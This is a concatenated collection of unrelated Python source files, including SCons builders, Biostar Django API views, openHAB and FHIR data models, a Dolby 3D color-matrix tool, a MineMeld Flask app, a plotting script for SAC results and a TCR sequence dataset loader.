_convert_list_R(newlist, source)
return target, newlist
_common_varlist = ['SUBST_DICT', 'LINESEPARATOR']
_text_varlist = _common_varlist + ['TEXTFILEPREFIX', 'TEXTFILESUFFIX']
_text_builder = SCons.Builder.Builder(
action=SCons.Action.Action(_action, _strfunc, varlist=_text_varlist),
source_factory=Value,
emitter=_convert_list,
prefix='$TEXTFILEPREFIX',
suffix='$TEXTFILESUFFIX',
)
_subst_varlist = _common_varlist + ['SUBSTFILEPREFIX', 'SUBSTFILESUFFIX']
_subst_builder = SCons.Builder.Builder(
action=SCons.Action.Action(_action, _strfunc, varlist=_subst_varlist),
source_factory=SCons.Node.FS.File,
emitter=_convert_list,
prefix='$SUBSTFILEPREFIX',
suffix='$SUBSTFILESUFFIX',
src_suffix=['.in'],
)
def generate(env):
env['LINESEPARATOR'] = LINESEP # os.linesep
env['BUILDERS']['Textfile'] = _text_builder
env['TEXTFILEPREFIX'] = ''
env['TEXTFILESUFFIX'] = '.txt'
env['BUILDERS']['Substfile'] = _subst_builder
env['SUBSTFILEPREFIX'] = ''
env['SUBSTFILESUFFIX'] = ''
def exists(env):
return 1
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
py | b40431fb330fdfc75ccdb74d5c12b943fbaee10b |
import json
import os
import logging
from os.path import join, normpath
from django.core.cache import cache
from django.conf import settings
from datetime import datetime, timedelta
from django.http import HttpResponse
from biostar.accounts.models import Profile, User
from . import util
from .models import Post, Vote, Subscription, PostView
logger = logging.getLogger("engine")
def api_error(msg="Api Error"):
return {'error': msg}
def stat_file(date, data=None, load=False, dump=False):
os.makedirs(settings.STATS_DIR, exist_ok=True)
file_name = f'{date.year}-{date.month}-{date.day}.json'
file_path = normpath(join(settings.STATS_DIR, file_name))
def load_file():
# This will be FileNotFoundError in Python3.
if not os.path.isfile(file_path):
raise IOError
with open(file_path, 'r') as fin:
return json.loads(fin.read())
def dump_into_file():
with open(file_path, 'w') as fout:
fout.write(json.dumps(data))
if load:
return load_file()
if dump:
return dump_into_file()
def get_counts(end):
questions = Post.objects.filter(type=Post.QUESTION, creation_date__lt=end).count()
answers = Post.objects.filter(type=Post.ANSWER, creation_date__lt=end).count()
toplevel = Post.objects.filter(type__in=Post.TOP_LEVEL, creation_date__lt=end).exclude(type=Post.BLOG).count()
comments = Post.objects.filter(type=Post.COMMENT, creation_date__lt=end).count()
votes = Vote.objects.filter(date__lt=end).count()
users = User.objects.filter(profile__date_joined__lt=end).count()
data = {
'questions': questions,
'answers': answers,
'toplevel': toplevel,
'comments': comments,
'votes': votes,
'users': users,
}
return data
def compute_stats(date):
"""
Statistics about this website for the given date.
Statistics are stored to a json file for caching purpose.
Parameters:
date -- a `datetime`.
"""
start = date.date()
end = start + timedelta(days=1)
try:
return stat_file(date=start, load=True)
except Exception as exc: # This will be FileNotFoundError in Python3.
logger.info('No stats file for {}.'.format(start))
new_users = Profile.objects.filter(date_joined__gte=start,
date_joined__lt=end).values_list("uid", flat=True)
new_posts = Post.objects.filter(creation_date__gte=start,
creation_date__lt=end).values_list("uid", flat=True)
new_votes = Vote.objects.filter(date__gte=start,
date__lt=end).values_list("uid", flat=True)
data = {
'date': util.datetime_to_iso(start),
'timestamp': util.datetime_to_unix(start),
'new_users': list(new_users),
'new_posts': list(new_posts),
'new_votes': list(new_votes),
}
data.update(get_counts(end=end))
if not settings.DEBUG:
stat_file(dump=True, date=start, data=data)
return data
def json_response(f):
"""
Converts any functions which returns a dictionary to a proper HttpResponse with json content.
"""
def to_json(request, *args, **kwargs):
"""
Creates the actual HttpResponse with json content.
"""
try:
data = f(request, *args, **kwargs)
except Exception as exc:
logger.error(exc)
data = api_error(msg=f"Error: {exc}")
payload = json.dumps(data, sort_keys=True, indent=4)
response = HttpResponse(payload, content_type="application/json")
if not data:
response.status_code = 404
response.reason_phrase = 'Not found'
return response
return to_json
@json_response
def daily_stats_on_day(request, day):
"""
Statistics about this website for the given day.
Day-0 is the day of the first post.
Parameters:
day -- a day, given as a number of days from day-0 (the day of the first post).
"""
store = cache.get('default')
day_zero = cache.get('day_zero')
first_post = Post.objects.order_by('creation_date').only('creation_date')
if day_zero is None and not first_post:
return False
if day_zero is None:
day_zero = first_post[0].creation_date
store.set('day_zero', day_zero, 60 * 60 * 24 * 7) # Cache valid for a week.
date = day_zero + timedelta(days=int(day))
# We don't provide stats for today or the future.
if not date or date.date() >= datetime.today().date():
return {}
return compute_stats(date)
@json_response
def daily_stats_on_date(request, year, month, day):
"""
Statistics about this website for the given date.
Parameters:
year -- Year, 4 digits.
month -- Month, 2 digits.
day -- Day, 2 digits.
"""
date = datetime(int(year), int(month), int(day))
# We don't provide stats for today or the future.
if date.date() >= datetime.today().date():
return {}
return compute_stats(date)
@json_response
def traffic(request):
"""
Traffic as post views in the last 60 min.
"""
now = datetime.now()
start = now - timedelta(minutes=60)
post_views = PostView.objects.filter(date__gt=start).exclude(date__gt=now).distinct('ip').count()
data = {
'date': util.datetime_to_iso(now),
'timestamp': util.datetime_to_unix(now),
'post_views_last_60_min': post_views,
}
return data
@json_response
def user_email(request, email):
user = User.objects.filter(email__iexact=email.lower())
if user.exists():
return True
return False
@json_response
def user_details(request, uid):
"""
Details for a user.
Parameters:
id -- the uid of the `User`.
"""
user = User.objects.filter(profile__uid=uid).first()
if not user:
return {}
days_ago = (datetime.now().date() - user.profile.date_joined.date()).days
data = {
'id': user.id,
'uid': user.profile.uid,
'name': user.name,
'date_joined': util.datetime_to_iso(user.profile.date_joined),
'last_login': util.datetime_to_iso(user.profile.last_login),
'joined_days_ago': days_ago,
'vote_count': Vote.objects.filter(author=user).count(),
}
return data
@json_response
def post_details(request, uid):
"""
Details for a post.
Parameters:
id -- the id of the `Post`.
"""
post = Post.objects.filter(uid=uid).first()
if not post:
return {}
return post.json_data()
@json_response
def watched_tags(request, uid):
"""
Show watched tags for a user, given API key.
Parameters:
id -- the id of the `User`.
"""
# Get the API token.
user = User.objects.filter(profile__uid=uid).first()
if user:
data = {
'id': user.id,
'uid': user.profile.uid,
'name': user.name,
'watched_tags': user.profile.watched_tags
}
else:
data = {}
return data
@json_response
def vote_details(request, id):
"""
Details for a vote.
Parameters:
id -- the id of the `Vote`.
"""
vote = Vote.objects.filter(uid=id)
if not vote:
return {}
data = {
'id': vote.id,
'author_id': vote.author.id,
'author': vote.author.name,
'post_id': vote.post.id,
'type': vote.get_type_display(),
'type_id': vote.type,
'date': util.datetime_to_iso(vote.date),
}
return data |
py | b404321b38bb6283adf924638f7cfbc810fa0939 | from typing import Any, Dict, List, Optional
from pydantic import BaseModel
class OpenhabThingChannelDefinition(BaseModel):
linkedItems: Optional[List[str]]
uid: Optional[str]
id: Optional[str]
channelTypeUID: Optional[str]
itemType: Optional[str]
kind: Optional[str]
label: Optional[str]
description: Optional[str]
defaultTags: Optional[List[str]]
properties: Optional[Dict[str, Any]]
configuration: Optional[Dict[str, Any]]
class OpenhabThingDefinition(BaseModel):
label: Optional[str]
bridgeUID: Optional[str]
configuration: Dict[str, Any]
properties: Dict[str, Any]
UID: Optional[str]
thingTypeUID: Optional[str]
channels: Optional[List[OpenhabThingChannelDefinition]]
location: Optional[str]
statusInfo: Optional[Dict[str, str]]
firmwareStatus: Optional[Dict[str, str]]
editable: Optional[bool]
|
py | b404333bdfa468cc3adc1b010855966b88257c11 | from __future__ import annotations
from typing import Optional, TYPE_CHECKING
from spark_auto_mapper_fhir.fhir_types.list import FhirList
from spark_auto_mapper_fhir.fhir_types.string import FhirString
from spark_auto_mapper_fhir.extensions.extension_base import ExtensionBase
from spark_auto_mapper_fhir.base_types.fhir_backbone_element_base import (
FhirBackboneElementBase,
)
if TYPE_CHECKING:
pass
# id_ (string)
# extension (Extension)
# modifierExtension (Extension)
# code (generic_type)
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
# op (generic_type)
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class TerminologyCapabilitiesFilter(FhirBackboneElementBase):
"""
TerminologyCapabilities.Filter
A TerminologyCapabilities resource documents a set of capabilities (behaviors) of a FHIR Terminology Server that may be used as a statement of actual server functionality or a statement of required or desired server implementation.
"""
# noinspection PyPep8Naming
def __init__(
self,
*,
id_: Optional[FhirString] = None,
extension: Optional[FhirList[ExtensionBase]] = None,
modifierExtension: Optional[FhirList[ExtensionBase]] = None,
code: GenericTypeCode,
op: FhirList[GenericTypeCode],
) -> None:
"""
A TerminologyCapabilities resource documents a set of capabilities (behaviors)
of a FHIR Terminology Server that may be used as a statement of actual server
functionality or a statement of required or desired server implementation.
:param id_: None
:param extension: May be used to represent additional information that is not part of the basic
definition of the element. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
:param modifierExtension: May be used to represent additional information that is not part of the basic
definition of the element and that modifies the understanding of the element
in which it is contained and/or the understanding of the containing element's
descendants. Usually modifier elements provide negation or qualification. To
make the use of extensions safe and manageable, there is a strict set of
governance applied to the definition and use of extensions. Though any
implementer can define an extension, there is a set of requirements that SHALL
be met as part of the definition of the extension. Applications processing a
resource are required to check for modifier extensions.
Modifier extensions SHALL NOT change the meaning of any elements on Resource
or DomainResource (including cannot change the meaning of modifierExtension
itself).
:param code: Code of the property supported.
:param op: Operations supported for the property.
"""
super().__init__(
id_=id_,
extension=extension,
modifierExtension=modifierExtension,
code=code,
op=op,
)
|
py | b404348129e3cb1c260af2ef30f768f5c8858079 | #!/usr/bin/env python
# Copyright (c) 2016, Blake G. Sloan
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1.Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2.Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
This is a command-line utility for generating 3x3 matrices to transform linear
RGB values from each eye of a Dolby Stereo 3D projector to P3 color space.
Measurements of CIE xy chromaticity pairs for R,G,B and W for each eye are
provided through a json file (see test/measurements.json).
Resulting matrices are printed to the terminal output and can optionally by
written to their own json file.
"""
import os
import sys
import numpy as np
import json
import math
from optparse import OptionParser
def parse_cmdline():
parser = OptionParser()
parser.add_option("-i", "--input", dest="infname",
help="Read left and right primaries and white point from json file")
parser.add_option("-o", "--output", dest="outfname",
help="Write left and right compensation matrices to json file")
parser.add_option("-t", "--test", dest="test", action="store_false",
help="Use dummy left/right primaries to test the program")
return parser.parse_args()
def promote_xyz(a):
"""
Add a 'z' coordinate to each xy pair
"""
for p in a:
p.append(1.0-p[0]-p[1])
return a
def xyz_to_XYZ(v):
"""
convert xyz to XYZ
"""
V = [(1.0/v[1])*v[0], 1.0,(1.0/v[1])*v[2]]
#print "XYZ val:",V
return V
def primaries_to_XYZ(b):
"""
Linear algebra bit.
Reference: http://www.ryanjuckett.com/programming/rgb-color-space-conversion/
"""
c = b[0:3]
bb = np.matrix(c)
d = bb.T.I
w = np.matrix(xyz_to_XYZ(b[3])).transpose()
v = d*w
diag_w = np.diagflat(v)
return bb.T * diag_w
def compute_norm(mat):
m = mat.tolist()
a = m[0][0]+m[0][1]+m[0][2]
b = m[1][0]+m[1][1]+m[1][2]
c = m[2][0]+m[2][1]+m[2][2]
if a > b:
if a > c:
return a
else:
return c
else:
return b
def a_to_b(a, b):
"""
Make a colorspace conversion matrix between two sets of primaries.
"""
a_to_xyz = primaries_to_XYZ(a)
#print "ToXYZ:",a_to_xyz
b_to_xyz = primaries_to_XYZ(b)
return a_to_xyz.I * b_to_xyz
if __name__ in "__main__":
# To test the program, run with --test
test_dcip3_rgbw = [[0.68, 0.32], [0.265, 0.69], [0.15,0.06], [0.314, 0.351]]
test_left_rgbw = [[0.62, 0.34], [0.31, 0.54], [0.18,0.07], [0.3201, 0.314]]
test_right_rgbw = [[0.65, 0.32], [0.29, 0.61], [0.17,0.04], [0.3100, 0.332]]
options,args = parse_cmdline()
if options.infname != '':
handle = open(options.infname, 'r')
data = json.load(handle)
handle.close()
test_left_rgbw = data['left_primaries_and_wp']
test_right_rgbw = data['right_primaries_and_wp']
# Let's add the 'z' component
left = promote_xyz(test_left_rgbw)
right = promote_xyz(test_right_rgbw)
p3 = promote_xyz(test_dcip3_rgbw)
print "left\n",np.matrix(left)
print "right\n",np.matrix(right)
print "DCI-P3\n",np.matrix(p3)
left_to_p3 = a_to_b(test_left_rgbw, p3)
right_to_p3 = a_to_b(test_right_rgbw, p3)
left_norm = compute_norm(left_to_p3)
right_norm = compute_norm(right_to_p3)
left_to_p3 = left_to_p3 / left_norm
right_to_p3 = right_to_p3 / right_norm
print "left_to_p3"
print left_to_p3
print "right_to_p3"
print right_to_p3
if options.outfname != '':
handle = open(options.outfname, 'w')
handle.write(json.dumps({'left':(left_to_p3).tolist(), 'right':(right_to_p3).tolist()}))
handle.close()
|
py | b40434abd33233499625e19e882556536928b356 | # Copyright 2015 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import yaml
from flask import Flask
import minemeld.loader
from .logger import LOG
REDIS_URL = os.environ.get('REDIS_URL', 'unix:///var/run/redis/redis.sock')
def create_app():
yaml.SafeLoader.add_constructor(
u'tag:yaml.org,2002:timestamp',
yaml.SafeLoader.construct_yaml_str
)
app = Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 5 * 1024 * 1024 # max 5MB for uploads
LOG.init_app(app)
# extension code
from . import config
from . import aaa
from . import session
from . import mmrpc
from . import redisclient
from . import supervisorclient
from . import jobs
from . import sns
from . import events
session.init_app(app, REDIS_URL)
aaa.init_app(app)
config.init()
if config.get('DEBUG', False):
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
mmrpc.init_app(app)
redisclient.init_app(app)
supervisorclient.init_app(app)
jobs.init_app(app)
sns.init_app()
events.init_app(app, REDIS_URL)
# entrypoints
from . import metricsapi # noqa
from . import feedredis # noqa
from . import configapi # noqa
from . import configdataapi # noqa
from . import taxiidiscovery # noqa
from . import taxiicollmgmt # noqa
from . import taxiipoll # noqa
from . import supervisorapi # noqa
from . import loginapi # noqa
from . import prototypeapi # noqa
from . import validateapi # noqa
from . import aaaapi # noqa
from . import statusapi # noqa
from . import tracedapi # noqa
from . import logsapi # noqa
from . import extensionsapi # noqa
from . import jobsapi # noqa
configapi.init_app(app)
extensionsapi.init_app(app)
app.register_blueprint(metricsapi.BLUEPRINT)
app.register_blueprint(statusapi.BLUEPRINT)
app.register_blueprint(feedredis.BLUEPRINT)
app.register_blueprint(configapi.BLUEPRINT)
app.register_blueprint(configdataapi.BLUEPRINT)
app.register_blueprint(taxiidiscovery.BLUEPRINT)
app.register_blueprint(taxiicollmgmt.BLUEPRINT)
app.register_blueprint(taxiipoll.BLUEPRINT)
app.register_blueprint(supervisorapi.BLUEPRINT)
app.register_blueprint(loginapi.BLUEPRINT)
app.register_blueprint(prototypeapi.BLUEPRINT)
app.register_blueprint(validateapi.BLUEPRINT)
app.register_blueprint(aaaapi.BLUEPRINT)
app.register_blueprint(tracedapi.BLUEPRINT)
app.register_blueprint(logsapi.BLUEPRINT)
app.register_blueprint(extensionsapi.BLUEPRINT)
app.register_blueprint(jobsapi.BLUEPRINT)
# install blueprints from extensions
for apiname, apimmep in minemeld.loader.map(minemeld.loader.MM_API_ENTRYPOINT).iteritems():
LOG.info('Loading blueprint from {}'.format(apiname))
if not apimmep.loadable:
LOG.info('API entrypoint {} not loadable, ignored'.format(apiname))
continue
try:
bprint = apimmep.ep.load()
app.register_blueprint(bprint)
except (ImportError, RuntimeError):
LOG.exception('Error loading API entry point {}'.format(apiname))
# install webui blueprints from extensions
for webuiname, webuimmep in minemeld.loader.map(minemeld.loader.MM_WEBUI_ENTRYPOINT).iteritems():
LOG.info('Loading blueprint from {}'.format(webuiname))
if not webuimmep.loadable:
LOG.info('API entrypoint {} not loadable, ignored'.format(webuiname))
continue
try:
bprint = webuimmep.ep.load()
app.register_blueprint(
bprint(),
url_prefix='/extensions/webui/{}'.format(webuiname)
)
except (ImportError, RuntimeError):
LOG.exception('Error loading WebUI entry point {}'.format(webuiname))
for r in app.url_map.iter_rules():
LOG.debug('app rule: {!r}'.format(r))
return app
|
py | b404355fc05e6784c593b10906db5931f384f33d | # -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-11-25 11:18
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('projects', '0044_auto_20190703_1300'),
('docsitalia', '0018_create_allowed_tags'),
]
operations = [
migrations.CreateModel(
name='ProjectOrder',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('priority', models.PositiveIntegerField(default=0, help_text='Greater number goes first in Project list')),
('project', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='projects.Project', verbose_name='Projects')),
],
options={
'verbose_name': 'project order',
'verbose_name_plural': 'projects order',
'ordering': ('-priority',),
},
),
]
|
py | b404368aea56e2fe2dffb250d4ed1a534e5f0999 | import argparse
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
SAC = {
"Hopper-v2": [
"extra/multistep/SAC_online_n_1_Hopper-v2_1_20210907092100/evaluation.csv",
"extra/multistep/SAC_online_n_1_Hopper-v2_2_20210907121407/evaluation.csv",
"extra/multistep/SAC_online_n_1_Hopper-v2_3_20210907150406/evaluation.csv",
],
"HalfCheetah-v2": [
"extra/multistep/SAC_online_n_1_HalfCheetah-v2_1_20210907175459/evaluation.csv",
"extra/multistep/SAC_online_n_1_HalfCheetah-v2_2_20210907204725/evaluation.csv",
"extra/multistep/SAC_online_n_1_HalfCheetah-v2_3_20210907233759/evaluation.csv",
],
"Walker2d-v2": [
"extra/multistep/SAC_online_n_1_Walker2d-v2_1_20210908022849/evaluation.csv",
"extra/multistep/SAC_online_n_1_Walker2d-v2_2_20210908052149/evaluation.csv",
"extra/multistep/SAC_online_n_1_Walker2d-v2_3_20210908081437/evaluation.csv",
],
"HopperBulletEnv-v0": [
"extra/multistep/SAC_online_n_1_HopperBulletEnv-v0_1_20210913021439/evaluation.csv",
"extra/multistep/SAC_online_n_1_HopperBulletEnv-v0_2_20210913065751/evaluation.csv",
"extra/multistep/SAC_online_n_1_HopperBulletEnv-v0_3_20210913114051/evaluation.csv",
],
"HalfCheetahBulletEnv-v0": [
"extra/multistep/SAC_online_n_1_HalfCheetahBulletEnv-v0_1_20210912112616/evaluation.csv",
"extra/multistep/SAC_online_n_1_HalfCheetahBulletEnv-v0_2_20210912162156/evaluation.csv",
"extra/multistep/SAC_online_n_1_HalfCheetahBulletEnv-v0_3_20210912211840/evaluation.csv",
],
"Walker2DBulletEnv-v0": [
"extra/multistep/SAC_online_n_1_Walker2DBulletEnv-v0_1_20210913162159/evaluation.csv",
"extra/multistep/SAC_online_n_1_Walker2DBulletEnv-v0_2_20210913211400/evaluation.csv",
"extra/multistep/SAC_online_n_1_Walker2DBulletEnv-v0_3_20210914015659/evaluation.csv",
]
}
QR_SAC = {
"Hopper-v2": [
"extra/dist/SAC_online_qr_Hopper-v2_1_20210909011159/evaluation.csv",
"extra/dist/SAC_online_qr_Hopper-v2_2_20210909033231/evaluation.csv",
"extra/dist/SAC_online_qr_Hopper-v2_3_20210909055317/evaluation.csv",
],
"HalfCheetah-v2": [
"extra/dist/SAC_online_qr_HalfCheetah-v2_1_20210908180856/evaluation.csv",
"extra/dist/SAC_online_qr_HalfCheetah-v2_2_20210908202936/evaluation.csv",
"extra/dist/SAC_online_qr_HalfCheetah-v2_3_20210908225154/evaluation.csv",
],
"Walker2d-v2": [
"extra/dist/SAC_online_qr_Walker2d-v2_1_20210908110605/evaluation.csv",
"extra/dist/SAC_online_qr_Walker2d-v2_2_20210908132528/evaluation.csv",
"extra/dist/SAC_online_qr_Walker2d-v2_3_20210908154657/evaluation.csv",
],
"HopperBulletEnv-v0": [
"extra/dist/SAC_online_qr_HopperBulletEnv-v0_1_20210913032234/evaluation.csv",
"extra/dist/SAC_online_qr_HopperBulletEnv-v0_2_20210913055127/evaluation.csv",
"extra/dist/SAC_online_qr_HopperBulletEnv-v0_3_20210913081937/evaluation.csv",
],
"HalfCheetahBulletEnv-v0": [
"extra/dist/SAC_online_qr_HalfCheetahBulletEnv-v0_1_20210912193246/evaluation.csv",
"extra/dist/SAC_online_qr_HalfCheetahBulletEnv-v0_2_20210912220918/evaluation.csv",
"extra/dist/SAC_online_qr_HalfCheetahBulletEnv-v0_3_20210913004612/evaluation.csv",
],
"Walker2DBulletEnv-v0": [
"extra/dist/SAC_online_qr_Walker2DBulletEnv-v0_1_20210912115500/evaluation.csv",
"extra/dist/SAC_online_qr_Walker2DBulletEnv-v0_2_20210912142816/evaluation.csv",
"extra/dist/SAC_online_qr_Walker2DBulletEnv-v0_3_20210912165944/evaluation.csv",
]
}
IQN_SAC = {
"Hopper-v2": [
"extra/dist/SAC_online_iqn_Hopper-v2_1_20210908233348/evaluation.csv",
"extra/dist/SAC_online_iqn_Hopper-v2_2_20210909052157/evaluation.csv",
"extra/dist/SAC_online_iqn_Hopper-v2_3_20210909112027/evaluation.csv",
],
"HalfCheetah-v2": [
"extra/dist/SAC_online_iqn_HalfCheetah-v2_1_20210909171057/evaluation.csv",
"extra/dist/SAC_online_iqn_HalfCheetah-v2_2_20210909231110/evaluation.csv",
"extra/dist/SAC_online_iqn_HalfCheetah-v2_3_20210910050232/evaluation.csv",
],
"Walker2d-v2": [
"extra/dist/SAC_online_iqn_Walker2d-v2_1_20210908233406/evaluation.csv",
"extra/dist/SAC_online_iqn_Walker2d-v2_2_20210909051902/evaluation.csv",
"extra/dist/SAC_online_iqn_Walker2d-v2_3_20210909111702/evaluation.csv",
],
"HopperBulletEnv-v0": [
"extra/dist/SAC_online_iqn_HopperBulletEnv-v0_1_20210913030912/evaluation.csv",
"extra/dist/SAC_online_iqn_HopperBulletEnv-v0_2_20210913080425/evaluation.csv",
"extra/dist/SAC_online_iqn_HopperBulletEnv-v0_3_20210913130150/evaluation.csv",
],
"HalfCheetahBulletEnv-v0": [
"extra/dist/SAC_online_iqn_HalfCheetahBulletEnv-v0_1_20210912115226/evaluation.csv",
"extra/dist/SAC_online_iqn_HalfCheetahBulletEnv-v0_2_20210912170009/evaluation.csv",
"extra/dist/SAC_online_iqn_HalfCheetahBulletEnv-v0_3_20210912220503/evaluation.csv",
],
"Walker2DBulletEnv-v0": [
"extra/dist/SAC_online_iqn_Walker2DBulletEnv-v0_1_20210913175909/evaluation.csv",
"extra/dist/SAC_online_iqn_Walker2DBulletEnv-v0_2_20210913230802/evaluation.csv",
"extra/dist/SAC_online_iqn_Walker2DBulletEnv-v0_3_20210914041137/evaluation.csv",
]
}
def plot(score_list, label):
data = []
for path in score_list:
data.append(np.loadtxt(path, delimiter=","))
x = np.transpose(np.array(data), [2, 1, 0])[1, :, :]
y = np.transpose(np.array(data), [2, 1, 0])[2, :, :]
sns.lineplot(x=x.reshape(-1), y=y.reshape(-1), label=label)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--env', type=str)
parser.add_argument('--save', type=str)
args = parser.parse_args()
plot(SAC[args.env], "SAC")
plot(QR_SAC[args.env], "QR-SAC")
plot(IQN_SAC[args.env], "IQN-SAC")
plt.title(args.env)
plt.xlabel("million step")
plt.xticks([0, 200000, 400000, 600000, 800000, 1000000],
["0", "0.2", "0.4", "0.6", "0.8", "1.0"])
plt.xlim(0, 1000000)
plt.ylabel("average return")
plt.legend()
if args.save:
plt.savefig(args.save)
else:
plt.show()
if __name__ == "__main__":
main()
|
py | b40437aeeabf1479bbb202d9ea86ccdb00190072 | """
Code for loading data
"""
import os, sys
import shutil
import argparse
import functools
import multiprocessing
import gzip
import inspect
import glob
import json
import itertools
import collections
import logging
from typing import *
import torch
from torch.utils.data import Dataset
import numpy as np
import pandas as pd
import Levenshtein
import featurization as ft
import utils
LOCAL_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(__file__)), "data")
assert os.path.isdir(LOCAL_DATA_DIR)
EXTERNAL_EVAL_DIR = os.path.join(os.path.dirname(LOCAL_DATA_DIR), "external_eval")
assert os.path.join(EXTERNAL_EVAL_DIR)
# Names of datasets
DATASET_NAMES = {"LCMV", "VDJdb", "PIRD", "TCRdb"}
logging.basicConfig(level=logging.INFO)
class TcrABSupervisedIdxDataset(Dataset):
"""Dataset that returns TcrAB and label"""
def __init__(
self,
tcr_table: pd.DataFrame,
label_col: str = "tetramer",
pos_labels: Collection[str] = ["TetMid", "TetPos"],
idx_encode: bool = False,
max_a_len: Optional[int] = None,
max_b_len: Optional[int] = None,
disambiguate_labels: bool = True,
):
self.table = tcr_table
self.label_col = label_col
if disambiguate_labels:
logging.info("Deduping and removing examples with conflicting labels")
lcmv_dedup_ab, self.labels = dedup_lcmv_table(tcr_table)
self.tras, self.trbs = zip(*lcmv_dedup_ab)
else:
raise NotImplementedError(
"Running withough disambiguating labels causes duplicated and conflicting labels! This was the prior behavior, but is now deprecated"
)
tcr_a_lengths = [len(self.get_ith_tcr_a(i)) for i in range(len(self))]
tcr_b_lengths = [len(self.get_ith_tcr_b(i)) for i in range(len(self))]
self.max_a_len = max(tcr_a_lengths) if max_a_len is None else max_a_len
self.max_b_len = max(tcr_b_lengths) if max_b_len is None else max_b_len
self.idx_encode = idx_encode
logging.info(f"Maximum TCR A/B lengths: {self.max_a_len} {self.max_b_len}")
self.pos_labels = pos_labels
logging.info(f"Positive {label_col} labels: {pos_labels}")
def __len__(self) -> int:
return len(self.labels)
def get_ith_tcr_a(self, idx: int, pad: bool = False) -> str:
"""Gets the ith TRA sequence"""
seq = self.tras[idx]
if pad:
seq = ft.pad_or_trunc_sequence(seq, self.max_a_len, right_align=False)
return seq
def get_ith_tcr_b(self, idx: int, pad: bool = False) -> str:
"""Gets the ith TRB sequence"""
seq = self.trbs[idx]
if pad:
seq = ft.pad_or_trunc_sequence(seq, self.max_b_len, right_align=False)
return seq
def get_ith_sequence(self, idx: int) -> Tuple[str, str]:
"""Get the ith TRA/TRB pair"""
return self.tras[idx], self.trbs[idx]
def get_ith_label(self, idx: int, idx_encode: Optional[bool] = None) -> np.ndarray:
"""Get the ith label"""
label = self.labels[idx]
retval = float(np.any([l in label for l in self.pos_labels]))
retval = np.array([1.0 - retval, retval], dtype=np.float32)
idx_encode = self.idx_encode if idx_encode is None else idx_encode
if idx_encode:
retval = np.where(retval)[0]
return retval
def __getitem__(self, idx: int):
tcr_a_idx = ft.idx_encode(self.get_ith_tcr_a(idx, pad=True))
tcr_b_idx = ft.idx_encode(self.get_ith_tcr_b(idx, pad=True))
label = self.get_ith_label(idx)
return (
{
"tcr_a": torch.from_numpy(tcr_a_idx),
"tcr_b": torch.from_numpy(tcr_b_idx),
},
torch.from_numpy(label).type(torch.long).squeeze(),
)
class TcrABSupervisedOneHotDataset(TcrABSupervisedIdxDataset):
"""Dataset that encodes tcrAB as one hot encoded vectors"""
def __getitem__(self, idx: int):
tcr_a_idx = ft.one_hot(self.get_ith_tcr_a(idx, pad=True))
tcr_b_idx = ft.one_hot(self.get_ith_tcr_b(idx, pad=True))
label = self.get_ith_label(idx)
return (
{
"tcr_a": torch.from_numpy(tcr_a_idx),
"tcr_b": torch.from_numpy(tcr_b_idx),
},
torch.from_numpy(label).type(torch.long).squeeze(),
)
class TCRSupervisedIdxDataset(Dataset):
"""Dataset meant for either TRA or TRB supervised learning"""
def __init__(
self,
tcrs: Sequence[str],
labels: Sequence[bool],
idx_encode_labels: bool = True,
max_len: Optional[int] = None,
):
self.tcrs = tcrs
self.labels = labels
assert len(self.tcrs) == len(self.labels)
self.max_len = max_len # Defaults to None
determined_max_len = max([len(t) for t in tcrs])
if self.max_len is not None:
# If a max_len is explicitly given, check that it is greater than the actual max len
assert isinstance(self.max_len, int)
assert determined_max_len <= self.max_len
logging.info(
f"Given max_len of {self.max_len} exceeds (as expected) empirical max_len of {determined_max_len}"
)
else:
# If max_len is not given, directly set the max_len
logging.info(
f"Max len not set, using empirical max len of {determined_max_len}"
)
self.max_len = determined_max_len
logging.info(f"Using maximum length of {self.max_len}")
self.idx_encode_labels = idx_encode_labels
